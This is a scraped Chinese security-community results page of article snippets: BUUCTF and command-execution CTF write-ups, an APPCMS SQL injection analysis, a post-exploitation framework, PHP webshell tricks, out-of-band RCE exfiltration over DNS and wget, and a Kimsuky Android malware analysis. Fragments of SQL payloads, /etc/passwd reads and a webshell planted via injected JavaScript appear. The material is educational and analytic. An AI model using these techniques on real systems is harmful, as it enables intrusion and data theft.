首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

BUUCTF 刷题笔记——Web 1

执行之后会在浏览器中回显一段 base64 加密的字符串,即后端 flag.php 文件内容的密文。...一句话木马的本质就是利用 eval() 函数将 POST 方法传入的参数作为代码执行,那直接向 Syc 变量传递我们需要的指令,那就不需要工具就能拿到 flag 了。...上传含有一句话木马的 PHP 文件,浏览器回显 Not image,区区小文件依然无法上传,显然靶机对文件进行了过滤。禁用 js 后依旧失败,因此为后端过滤。...图片 前端好办,直接把 js 禁用就行了,再次上传,浏览器没有任何反应?调试发现回显在左上角,提示文件被禁止,因此后端还有过滤。...文件,因此尝试直接访问该文件,发现直接回显出了源代码,当然这是因为作者设定好未接收到变量则回显代码,只能说感谢手下留情了。

3.6K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    技术分享 | 深入分析APPCMS<=2.0.101 sql注入漏洞

    这里经过多次尝试在burp中不改变请求包中的验证码的值多次提交过去,能够得到code:0的回显的,也就是这里这个验证码验证是可以被绕过的!直接提交一次之后不变就可以了。...(2) 构造payload获取用户名密码 所以可以直接使用如下的语句将查询结果插入到content和uname,然后回显到前台的用户名和回复内容位置。...content,uname,date_add,ip) values ('1','0','0','aaaaaaaaaaaaaaaaaa','jaivy','1511926381','127.0.0.1'); 然后观察评论的回显...可以看到有几个地方是在插入了数据之后又回显出来的, content,uname,date_add和ip 所以这里我们可以选择content和uname这两个地方作为数据的回显 insert into appcms_comment...点击一下forward,这时自动执行了我们的恶意js,创建一个muma.php文件 ? 再点击一下forward,这时是、向muma.php文件中写入一句话木马 ?

    1.8K80

    404星链计划 | As-Exploits:中国蚁剑后渗透框架

    其余发包,回显处理等事情框架会自动帮你实现。想要自定义的话只需要继承父类然后重写对应方法即可。...总体设计 一个模块在初始化之后的流程大概是这样 当exploit事件发生时,会调用getArgs跟genPayload函数来组合成最后的payload,默认将回显数据发送到编辑框里。...也就是说关键的结构就是这个 其实跟PHP的序列化很相似,首先来个标志位表示变量的类型,然后是变量的长度,最后是变量的内容。 既然知道了其结构,那么修改的办法也就呼之欲出。...首先给插件起个炫酷的名字叫test,加入到根目录index.js的Modules里面。 然后在language\zh.js中增加对应的标签名字:测试。...接着新增一个test目录,这里的目录名称要与模块的名称一致,里面放两个文件:index.js跟payload.js。

    1.1K30

    命令执行漏洞

    c,在变量c中使用preg_match来匹配flag,如果没有flag,就执行变量c中的语句 给c传值,用system函数产生回显 ,可以解析并执行 因为不能出现flag,所以使用cp命令给flag.php...>&1=/etc/passwd ,发现可以回显 可以使用文件包含的原理来实现 ,原理就是加上一个php的过滤器 ,得到一串base64编码,解码即可获得flag web33 与web32中的方式一样,...next(array)内部参数为array,是一个数组 current() 输出数组中当前内部指针指向的元素的值 每个数组中都有一个内部的指针指向它的”当前”元素,初始指向插入到数组中的第一个元素。...c=print_r(get_defined_vars()); 发现是通过post给这个数组传参,尝试加一个post值 post传参后回显 为了拿到array中的那个phpinfo()的字符串,rce...c=ls%26%26ls 可以查看到回显,那么我们可以修改第一条命令来得到flag,因为第二条命令进入了黑洞中 ?

    31510

    buuctfWarmUp 1

    题目环境: 发现除了表情包,再无其他 F12试试 发现source.php文件 访问这个文件,格式如下: url/source.php 回显如下: PHP代码审计: 然后,checkFile方法检查 page是否存在于一个名为 whitelist的数组中。这个数组包含两个元素,分别是"source.php"和"hint.php"。...如果 page不在 whitelist中,那么checkFile方法将尝试通过以下步骤查找匹配的文件名: 首先,它将 page和问号(?)连接起来,然后查找这个字符串在 page中的位置。...然后,它对$page进行url解码,再重复之前的步骤。 如果以上两种方式都未能找到匹配的文件名,那么方法将输出"you can’t see it"并返回false。...查看hint.php内容 查看格式: url/hint.php 回显结果: 这里说flag在ffffllllaaaagggg文件里面 有了目标就好办了,构造下payload: url/source.php

    50040

    PHP回调函数与匿名函数实例详解

    本文实例讲述了PHP回调函数与匿名函数。分享给大家供大家参考,具体如下: 回调函数和匿名函数 回调函数、闭包在JS中并不陌生,JS使用它可以完成事件机制,进行许多复杂的操作。...通俗的解释就是把函数作为参数传入进另一个函数中使用;PHP中有许多 “需求参数为函数” 的函数,像array_map,usort,call_user_func_array之类,他们执行传入的函数,然后直接将结果返回主函数...好处是函数作为值使用起来方便,而且代码简洁,可读性强。 匿名函数 匿名函数,顾名思义,是没有一个确定函数名的函数,PHP将匿名函数和闭包视作相同的概念(匿名函数在PHP中也叫作闭包函数)。...它的用法,当然只能被当作变量来使用了。 PHP中将一个函数赋值给一个变量的方式有四种: ① 我们经常会用到的:函数在外部定义/或PHP内置,直接将函数名作为字符串参数传入。...可以用 is_callable($func_name) 来测试此函数是否可以被调用, 也可以通过$func_name($var)来直接调用;而第四种方式创建的函数比较类似于JS中的回调函数,不需要变量赋值

    1.2K20

    PHP回调函数与匿名函数实例详解

    本文实例讲述了PHP回调函数与匿名函数。分享给大家供大家参考,具体如下: 回调函数和匿名函数 回调函数、闭包在JS中并不陌生,JS使用它可以完成事件机制,进行许多复杂的操作。...通俗的解释就是把函数作为参数传入进另一个函数中使用;PHP中有许多 “需求参数为函数” 的函数,像array_map,usort,call_user_func_array之类,他们执行传入的函数,然后直接将结果返回主函数...好处是函数作为值使用起来方便,而且代码简洁,可读性强。 匿名函数 匿名函数,顾名思义,是没有一个确定函数名的函数,PHP将匿名函数和闭包视作相同的概念(匿名函数在PHP中也叫作闭包函数)。...它的用法,当然只能被当作变量来使用了。 PHP中将一个函数赋值给一个变量的方式有四种: ① 我们经常会用到的:函数在外部定义/或PHP内置,直接将函数名作为字符串参数传入。...可以用 is_callable($func_name) 来测试此函数是否可以被调用, 也可以通过$func_name($var)来直接调用;而第四种方式创建的函数比较类似于JS中的回调函数,不需要变量赋值

    99630

    实战技巧 | 知其代码方可审计

    我们看到传入的cid已经被addslashes()函数转义了,查询的地方都没啥问题,但是到浏览计数的时候调用了它,那么我们就可以使用盲注或者报错注入了,因为有错误回显。...0x01 变量覆盖演示 extract() extract(array,extract_rules,prefix)函数从数组中将变量导入到当前的符号表,即将数组中的键值对注册成函数,使用数组键名作为变量名...,使用数组键值作为变量值。...parse_str() parse_str()函数用于把查询字符串解析到变量中,如果没有array参数,则由该函数设置的变量将覆盖已存在的同名变量。...此函数只能用于PHP4.1 ~ PHP5.4。 ? $$ 典型的例子就是foreach来遍历数组中的值作为变量。 ? 其中_key的值为a,那么 a的值就被覆盖为2了。

    1.7K40

    BUUCTF 刷题笔记——Web 2

    /resource=useless.php 将浏览器回显的编码解码之后的 PHP 代码如下: PHP 文件,然后再传马即可。....> 然后分别上传两个文件,由于 MIME 信息存在过滤,因此上传时需要把数据报中的 Content-Type 字段修改为 image/png,上传之后浏览器会回显路径。...$host); } 程序通过 GET 方法接收一个 host 变量,并通过两个函数对数据进行处理,其中 escapeshellarg 函数会先将变量中含有的单引号转义掉,然后将单引号分割下的几部分都用单引号括起来...在 nmap 的参数中 -oG 可用于将命令以及结果输出到指定文件中,其中输出结果不好控制,但是如果命令就是一段 PHP 程序然后写入的又是 PHP 文件的话,之后访问这个文件不就想执行啥就执行啥。

    1.7K20

    深入浅出玩转php一句话(含过waf新姿势)

    你想执行cmd命令,则用exec() 当然前提是: php配置文件php.ini里,关掉安全模式safe_mode = off, 然后在看看 禁用函数列表 disable_functions = proc_open...’; 没有回显,不对 b=echo ‘okok’; 没有回显,不对 . . ....吐司论坛上,接地气表哥就已经给出过思路,用&连接多个变量参数,一次测试多个参数这样可以让你的爆破效率提高千倍 比如 一次放几百个参数,只要里面恰好有那个密码,就会有回显!...) 除以900的意思,就是把字典分成若干份,每份900个参数 分别递交给一句话 如果没有回显,说明这部分不含正确密码(就是那个post接收的参数) 那就拉倒,下一部分继续 但是一旦出现回显:okok,(...防:本地js对后缀名验证 攻:上传时,后缀先改成xxx.jpg,然后抓包拦截修改后缀成php 防:用函数对图片进行校验(随机取点验证) 攻:制作图片马,综合别的漏洞来解析图片马 防:上传文件改名字,改路径

    70240

    带外攻击OOB(RCE无回显骚思路总结)

    3.带外数据 传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。...由于TCP协议每次只能发送和接受带外数据一个字节,所以,我们可以通过设置一个数组,利用发送数组下标的办法让服务器程序能够知道自己要监听的端口以及要连接的服务器IP/port。...    2.1 优点:不出网机器可以传输    2.2 缺点: 1.回显是一条条执行,需要将回显结果拼接解码,回显信息比较麻烦          2.短回显可以使用DNS传输,长回显大部分带出需要...DNS管道解析的扩展,结合php命令执行可以使用这种方式进行回显,使用sed命令令回显变长:执行:http://xxx.xxx.xxx.xxx/test.php?...whoami%.ip.port.ttq72fceob0yxwq9342c4yuo2f85wu.burpcollaborator.net----Linux的应用1.http传输 1.1 wget传输使用wget将命令回显信息通过包头数据字符串

    5.8K40

    PHP中的回调函数和匿名函数

    回调函数和匿名函数 回调函数、闭包在JS中并不陌生,JS使用它可以完成事件机制,进行许多复杂的操作。PHP中却不常使用,今天来说一说PHP中中的回调函数和匿名函数。...通俗的解释就是把函数作为参数传入进另一个函数中使用;PHP中有许多 “需求参数为函数” 的函数,像array_map,usort,call_user_func_array之类,他们执行传入的函数,然后直接将结果返回主函数...好处是函数作为值使用起来方便,而且代码简洁,可读性强。 匿名函数: 匿名函数,顾名思义,是没有一个确定函数名的函数,PHP将匿名函数和闭包视作相同的概念(匿名函数在PHP中也叫作闭包函数)。...它的用法,当然只能被当作变量来使用了。 PHP中将一个函数赋值给一个变量的方式有四种: 我们经常会用到的:函数在外部定义/或PHP内置,直接将函数名作为字符串参数传入。...可以用 is_callable($func_name) 来测试此函数是否可以被调用, 也可以通过$func_name($var)来直接调用;而第四种方式创建的函数比较类似于JS中的回调函数,不需要变量赋值

    3.1K80

    Kimsuky APT组织使用新型的AppleSeed Android组件伪装成安全软件对韩特定目标进行攻击

    图片8 接受回显数据 ? 图片9 解析下载的文件数据 最终调用 a.d() 方法,a.d() 会根据指令类型执行相应的操作 指令类型为 1 时,会提醒用户更新并进行更新操作 ?...短信内容 然后伪装,上传 hxxp://download.riseknite.life/index.php?...图片20 红雨滴团队公开kimsuky的js样本 其js代码的主要功能就是将诱饵文档以及加upx的AppleSeed载荷写入**%ProgramData%**下,并且调用certutil.exe解密,然后运行诱饵文档以迷惑受害者...图片30 解密c2后将所收集的信息拼接 将其发送到C2并将回显数据写入**%temp%\xxxx.tmp中注意:[xxxx为前两位数字后两位字母的随机文件名]** ?...图片33 拼接上线数据包 将数据包发送到c2上 ?

    1.6K20

    PHP会话(Session)实现用户登陆功能

    一般不需要的,因为并不是每个人都有修改 php.ini 的权限,默认 Session 的存放路径是服务器的系统临时文件夹,我们可以自定义存放在自己的文件夹里,这个稍后我会介绍。...将 $_SESSION 看成是存储在服务器端的数组即可,我们注册的每一个变量都是数组的键,跟使用数组没有什么分别。 如果要登出系统怎么办?销毁 Session 即可。 PHP 会自动将 Session ID 发送到 URL 上,URL 形如:http://www.openphp.cn/index.php?...我们还可以将数组,对象存储在 Session 中。操作数组和操作一般变量没有什么区别,而保存对象的话,PHP 会自动对对象进行序列化(也叫串行化),然后保存于 Session 中。...> output.php php // 设置回调函数,确保重新构建对象。

    2.3K20

    BUUCTF-Web-WriteUp

    1' order by 2 # 成功回显 输入1' order by 3 # 回显错误 所以只有两个字段 0x03:显示字段 输入1′ union select 1,2 # 回显一个正则过滤规则...尝试堆叠注入 0x04:查询数据库 输入1';show databases;# 成功回显 说明存在堆叠注入 0x05:查询表 输入1';show tables;# 成功回显 得到两个表words...word这张表中回显的,那我们怎么才能让它回显flag所在的表呢 内部查询语句类似 :select id, data from word where id = 他既然没过滤 alert 和 rename...但只有一个是真正可以执行的 将每个php文件里的$ _GET参数提取出来逐个爆破就行了 代码参考网上大佬的 # coding:utf-8 #!...flag.php文件 所以我们要做的就是将SQL语句查询结果中data字段反序列化后,内容中的url等于flag.php即可。

    1.5K20

    扫码

    添加站长 进交流群

    领取专属 10元无门槛券

    手把手带您无忧上云

    扫码加入开发者社群

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭
      领券